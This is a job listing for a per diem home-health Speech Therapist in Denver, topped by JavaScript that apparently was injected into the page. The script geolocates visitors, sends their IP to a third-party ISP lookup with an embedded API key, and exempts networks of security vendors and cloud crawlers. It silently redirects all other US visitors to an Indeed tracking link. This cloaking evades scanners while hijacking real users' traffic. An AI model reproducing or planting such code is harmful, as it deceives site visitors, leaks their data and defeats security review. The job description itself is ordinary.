Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/7d86513199d2a61f/d1aeb254b5bdf81d2f56ef0efb6a4e9e8531cf367a4f5eecd06e4e8715028938/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Join an award-winning home health provider in the Denver area as a per diem Speech Therapist, dedicated to delivering high-quality care to patients in their homes.
We are seeking an experienced ST passionate about making a positive impact through speech therapy, following physician-approved evaluations and treatment plans.
The role involves providing patient care under physician supervision, documenting evaluations, treatments, and progress, and collaborating with a medical team of physicians and clinical staff.
**Qualifications:**
• Master’s degree in speech pathology
• Colorado license or clinical competency certification
• CPR certification
• Effective communication skills in English
• Ability to operate necessary equipment and tools
Benefits include flexible scheduling, competitive pay ($70-$80/hr), 401(k) with matching, health/dental/vision insurance, paid time off, and more. This on-the-road role offers an opportunity to make a difference and be part of a dedicated care team.
Visit us or contact us to learn more!